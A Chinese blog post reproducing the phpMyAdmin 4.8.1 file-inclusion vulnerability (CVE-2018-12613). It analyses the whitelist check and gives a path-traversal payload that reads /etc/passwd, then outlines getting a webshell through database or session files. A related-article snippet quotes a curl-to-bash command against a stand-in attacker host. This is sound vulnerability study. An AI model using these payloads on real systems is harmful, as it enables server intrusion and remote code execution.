phpmyadmin文件包含漏洞复现(CVE-2018-12613)

最新推荐文章于 2024-09-12 19:20:20 发布
最新推荐文章于 2024-09-12 19:20:20 发布
阅读量1.1k 收藏 2
点赞数 4
分类专栏: 代码审计 文章标签: phpmyadmin
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rfrder/article/details/116405557
版权

前言

一个非常经典的漏洞了,以前只是直接拿payload打,还没认真的在本地复现过,看过漏洞的代码到底是怎么回事,所以今天从github上下载phpmyadmin4.8.1,到vps上然后复现一波,看一下代码的问题。

复现

漏洞出现在index.php的第61行:

在这里插入图片描述
存在任意文件包含,但是需要进入if才可以。
一层一层的来看,首先target不为空,而且是字符串,这很容易满足,而且不以index开头,而且不在黑名单中:

$target_blacklist = array (
    'import.php', 'export.php'
);

这些都是非常容易满足的,关键就在于最后的这个checkPageValidity

    public static function checkPageValidity(&$page, array $whitelist = [])
    {
        if (empty($whitelist)) {
            $whitelist = self::$goto_whitelist;
        }
        if (! isset($page) || !is_string($page)) {
            return false;
        }

        if (in_array($page, $whitelist)) {
            return true;
        }

        $_page = mb_substr(
            $page,
            0,
            mb_strpos($page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }

        $_page = urldecode($page);
        $_page = mb_substr(
            $_page,
            0,
            mb_strpos($_page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }

        return false;
    }

我看到这个代码的第一反应是我人傻了,这不是buuctf的那个web第一题warmup吗?好家伙原来那题的来源就是这个CVE。
白名单是这个:

    public static $goto_whitelist = array(
        'db_datadict.php',
        'db_sql.php',
        'db_events.php',
        'db_export.php',
        'db_importdocsql.php',
        'db_multi_table_query.php',
        'db_structure.php',
        'db_import.php',
        'db_operations.php',
        'db_search.php',
        'db_routines.php',
        'export.php',
        'import.php',
        'index.php',
        'pdf_pages.php',
        'pdf_schema.php',
        'server_binlog.php',
        'server_collations.php',
        'server_databases.php',
        'server_engines.php',
        'server_export.php',
        'server_import.php',
        'server_privileges.php',
        'server_sql.php',
        'server_status.php',
        'server_status_advisor.php',
        'server_status_monitor.php',
        'server_status_queries.php',
        'server_status_variables.php',
        'server_variables.php',
        'sql.php',
        'tbl_addfield.php',
        'tbl_change.php',
        'tbl_create.php',
        'tbl_import.php',
        'tbl_indexes.php',
        'tbl_sql.php',
        'tbl_export.php',
        'tbl_operations.php',
        'tbl_structure.php',
        'tbl_relation.php',
        'tbl_replace.php',
        'tbl_row_action.php',
        'tbl_select.php',
        'tbl_zoom_select.php',
        'transformation_overview.php',
        'transformation_wrapper.php',
        'user_password.php',
    );

首先判断page是不是在白名单中,如果是的话就返回true,我们想要任意文件包含的话肯定不可能,继续跟进。
又进行了一次截取:

        $_page = mb_substr(
            $page,
            0,
            mb_strpos($page . '?', '?')
        );

把page后面加个?,然后取开头到第一个问号中间的那部分字符串,然后再判断是不是在白名单中。
讲道理,在这里就已经可以成功了,只要加上个?即可:

/index.php?target=db_sql.php?/../../../../../../../etc/passwd

这里截取到db_sql.php,在白名单中然后return true了。然后就实现了任意文件包含漏洞。

在这里插入图片描述

能够包含任意文件,接下来的利用方式就非常简单了,想办法往文件里写shell然后包含就行了,有一种是往数据库里写shell:
创建一个库和表,我这里是feng库,shell表。然后里面的列名写shell:
在这里插入图片描述

然后找数据库的文件路径:

SELECT @@datadir

在这里插入图片描述
因为是feng库的shell表,所以就是feng/shell.frm,包含即可:
在这里插入图片描述

第二种就是直接select写进session文件来包含。
在这里插入图片描述
然后包含相应的session文件即可:
在这里插入图片描述
这里的session值是cookie中phpmyadmin的值:

phpMyAdmin=r5t91oacbr39749gr2tuetq23b;

参考文章

phpmyadmin4.8.1远程文件包含漏洞(CVE-2018-12613)
phpmyadmin4.8.1后台GetShell

bfengj
关注
专栏目录
[ vulhub漏洞复现篇 ] PHPmyadmin文件包含漏洞CVE-2018-12613
qq_51577576的博客
10-06 736
[ vulhub漏洞复现篇 ] PHPmyadmin文件包含漏洞CVE-2018-12613 在4.8.2之前的phpMyAdmin 4.8.x中发现了一个问题,攻击者可以在其中包含(查看并可能执行)服务器上的文件。该漏洞来自页面重定向和在phpMyAdmin中加载的部分代码,以及对列入白名单的页面的不正确测试。除“ $ cfg [‘AllowArbitraryServer’] = true”情况(攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码)外,攻击者还必须经过身份验证。
phpmyadmin 文件包含CVE-2014-8959)
千寻的博客
03-07 1833
- CNNVD编号:`CNNVD-201411-417 ` - 危害等级:` 中危 ` - CVE编号:` CVE-2014-8959 ` - 漏洞类型: `路径遍历 ` - 发布时间:` 2014-11-24 ` - 威胁类型: `远程 `
CVE-2018-12613phpMyAdmin文件包含漏洞复现
顶峰
03-29 662
漏洞
phpmyadminV4.8.1本地文件包含漏洞复现
seek_2022的博客
07-05 3223
出于学习和技术分享的目的,本文针对phpMyadmin-v4.8.1存在的文件包含漏洞,通过代码审计结合本地搭建测试环境的方式进行漏洞复现研究,以供大家参考学习。
phpmyadmin漏洞复现
最新发布
weixin_66022252的博客
09-12 260
是一条SQL语句,用于在MySQL数据库中启用全局查询日志(General Query Log)。这个日志记录了MySQL服务器接收到的每一个客户端请求,包括连接和断开连接的请求、SQL语句的执行等。这对于监控数据库活动、审计或调试是非常有用的。改变日志存储位置(mm.php为事先做好的一句话木马)从小皮登入靶场后输入账号密码进入靶场。访问php文件,并使用蚁剑进行连接。查看日志,发现一句话木马。连接成功~~~~~~~~点击sql框进行注入。
Phpmyadmin文件包含漏洞CVE-2018-12613
jammny
11-28 337
漏洞简介 index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。该漏洞需要登录进phpmyadmin页面才能利用。 漏洞影响 phpMyAdmin 4.8.0、4.8.1版本 漏洞分析 https://blog.csdn.net/qq_33020901/article/details/80829269 漏洞利用 访问存在漏洞版本的页面 payload构造如下: http://192.168.30.128:8080/index.php?target=d
PhPMyadmin-漏洞复现
weixin_57682301的博客
08-03 478
前情提要:首先将我们的PHP版本设置在5.5以上。
phpmyadmin文件包含
热门推荐
vergilben的学习日记
04-03 1万+
CVE-2018-12613 — 本地文件包含造成远程代码执行漏洞复现,其实就是我们常见的LFI漏洞。在我前面写的博客里面又详细介绍。这次我们直接进入墨者学院进行复现,不再自行搭建环境。 进入环境 这里使用弱口令进入,账号root,密码root。 进入之后页面如下: 执行sql语句挂入一句话木马 进入SQL执行页面 点击执行。 使用中国菜刀连接服务器 在根目录下我们发现key.txt文件,...
phpMyAdmin文件包含漏洞复现CVE-2018-12613
qq_34853514的博客
07-12 582
漏洞简介 漏洞编号: CVE-2018-12613 漏洞详情: 该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试。攻击者必须经过身份验证,但在这些情况下除外: $ cfg [‘AllowArbitraryServer’] = true:攻击者可以指定已经控制的任何主机,并在phpMyAdmin上执行任意代码 $ cfg [‘ServerDefault’] = 0:这会绕过登录并在没有任何身份验证的情况下运行易受攻击的代码 漏洞影响范围: phpMyAdm
漏洞复现phpmyadmin后台任意文件包含CVE-2018-12613
野原新之助
09-29 850
由于对index.php中包含文件的target参数未作严格的安全校验,导致可以被利用绕过白名单、黑名单校验从而进行本地文件包含,达到GetShell和命令执行的效果。
phpmyadmin-文件包含漏洞代码审计过程(超详细)
qq_59020256的博客
01-26 1359
phpmyadmin-文件包含漏洞
phpMyadmin(CVE-2018-12613)后台任意文件包含漏洞分析
weixin_30772105的博客
06-24 329
前言   影响版本:4.8.0——4.8.1   本次复现使用4.8.1 点击下载   复现平台为vulhub。此漏洞复现平台如何安装使用不在赘述。请自行百度。 漏洞复现      漏洞环境启动成功。   访问该漏洞地址:        使用payload: http://your-ip:8080/index.php?target=db_sql.php%253f/....
PhpMyAdmin文件包含漏洞
weixin_43622525的博客
02-28 1779
目录 漏洞描述 漏洞复现 复现 解决方法 漏洞描述 PhpMyAdmin 是一个用 PHP 编写的免费软件工具,旨在通过 Web 处理 MySQL 的管理。该漏洞在index.php中,导致文件包含漏洞。 在phpMyadmin4.8.x版本中,程序没有严格控制用户的输入,攻击者可以利用双重编码绕过程序的白名单限制,造成 LFI(本地文件包含漏洞。 受影响的系统版本为phpMyadmin4.8.0和phpMyadmin4.8.1。漏洞编号 CVE-2018-12613漏洞复现
thinkCMF 文件包含漏洞
Hacker_by_V的博客
09-09 1691
thinkCMF 文件包含漏洞 昨天给大家复现了tomcat CVE-2020-1938漏洞,那今天咱们一起再来看看,最为经典的thinkCMF文件包含漏洞。 ​ 首先我们在去介绍这个漏洞之前,我们需要先了解一下这个漏洞thinkCMF。 thinkCMF它是一个开源的,支持swoole的开源内容管理框架,让web开发更快,节约时间,这个框架的话是基于thinkphp的二次开发框架,所以说在我们国内还是有大部分的网站使用到这样的一个框架的。 那么我们可以想象一下如果这个框架出现了一个漏洞,那它的影响范围是
phpmyadmin漏洞_方兴未艾第3期 | phpMyAdmin文件包含漏洞
weixin_39884144的博客
11-30 230
phpMyAdmin文件包含漏洞Created 2020-07-22|Updated 2020-07-2201前言1.1CVE-2018-12613(phpMyAdmin文件包含漏洞)phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含漏洞,通过二次编码即可绕过检查1.2文件包含漏洞文件包含漏洞分为 本地文件包含(LFI) 和 ...
漏洞复现学习手册
谢公子的博客
08-09 4141
JAVA反序列化漏洞复现 OpenSSH命令注入漏洞复现(CVE-2020-15778) F5 BIG-IP TMUI远程代码执行漏洞复现(CVE-2020-5902) DNS Server远程代码执行漏洞复现(CVE-2020-1350) CVE-2020-0688漏洞复现 CVE-2019-1040域内漏洞提权复现 CVE-2020-0796(SMBv3远程代码执行)漏洞复现 通达OA低版本文件上传+apache解析漏洞getshell 通达OA命令执行漏洞复现(文件上传+文件包含)
phpmyadmin后台文件包含漏洞分析
nareku的博客
04-10 6056
前言 在墨者学院看到这道题给的标签是文件包含,就想着拿来练练手,果然不练不知道一练吓一跳,里面还是有很多我没学到和不懂的知识,所以就打算单独拿出来写一篇博客来记录一下。
PHP 输入验证漏洞 CVE-2018-10547复现
10-24
PHP 输入验证漏洞 CVE-2018-10547是一种远程代码执行漏洞,攻击者可以通过构造恶意IMAP服务器名称来注入任意OS命令语义,从而执行任意代码。以下是复现漏洞的步骤: 1. 构造恶意IMAP服务器名称,包含“ -oProxyCommand”参数,例如:`127.0.0.1 -oProxyCommand="curl http://attacker.com/malicious.sh|bash"` 2. 在PHP中使用imap_open()函数连接IMAP服务器,将恶意IMAP服务器名称作为参数传入。 3. 当PHP解析恶意IMAP服务器名称时,会执行其中的恶意代码,从而导致远程代码执行漏洞。 为了防止该漏洞的攻击,建议升级openssh到OpenSSH8.4及以上版本,并确保openssl和zlib也已经升级到最新版本。此外,还应该对输入进行严格的验证和过滤,避免恶意输入的注入。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值